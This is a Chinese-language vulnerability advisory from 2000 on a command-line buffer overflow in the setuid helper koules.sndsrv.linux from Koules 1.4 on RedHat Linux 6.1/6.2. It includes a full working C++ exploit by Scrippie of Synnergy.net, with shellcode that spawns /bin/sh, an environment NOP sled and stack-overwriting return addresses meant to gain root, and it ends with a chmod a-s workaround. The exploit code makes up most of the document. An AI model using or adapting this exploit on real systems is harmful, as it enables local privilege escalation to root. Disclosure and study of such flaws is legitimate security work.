发布日期：2000-11-21
更新日期：2000-11-21

受影响系统：

Koules1.4
   - RedHat Linux 6.1
   - RedHat Linux 6.2

描述：

---

Koules1.4 中所带的koules.sndsrv.linux在处理命令行参数时没有检查参数的
长度。攻击者可以利用此漏洞进行缓冲区溢出攻击，获得root权限。

只有编译时带了SVGALIB支持的以及没有X windows版本的'koules'的主机才可能
受此问题影响。

<* 来源：Scrippie（Scrippie/ronald@grafix.nl）
         http://www.synnergy.net
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP    'A'
#define NUMNOPS    500
#define RETADDY    "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */

string heavenlycode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

using namespace std;

main()
{
   string payload, vector;
   unsigned int i;
   const char *env[3];
   const char *ptr_to_bffffffc;

   /* Construction of our payload */
   payload.append(NUMNOPS, NOP);
   payload.append(heavenlycode);

   env[0] = payload.c_str();
   /* This memory address always contains 0x00000000 */
   env[1] = "\xfc\xff\xff\xbf";
   env[2] = NULL;

   /* Calculate for yourself, and check out: linux/fs/exec.c */
   ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                    -sizeof(heavenlycode)-sizeof(char *)-1));

   for(i=0;i<256;i++) {
      vector.append(RETADDY);        /* Fill the buffer */
   }
   /* We do NOT overwrite 'int i' - a register is used after gcc -O */
   vector.append(RETADDY);        /* Overwrites ebp */
   vector.append(RETADDY);        /* Overwrites eip */
   vector.append(ptr_to_bffffffc);    /* Overwrites argv argument */

   execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
          NULL, env);

   perror("execle()");
}

char *addytostr(unsigned char *blaat)
{
   char *ret;

   if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
      perror("malloc()");
      exit(EXIT_FAILURE);
   }
   memcpy(ret, &blaat, sizeof(unsigned char *));
   ret[sizeof(unsigned char *)] = 0x00;

   return(ret);
}

建议：

---

临时解决方法：

去掉koules.sndsrv.linux的suid/sgid属性：
chmod a-s koules.sndsrv.linux

厂商补丁：

暂无


浏览次数：5305
严重程度：0（网友投票）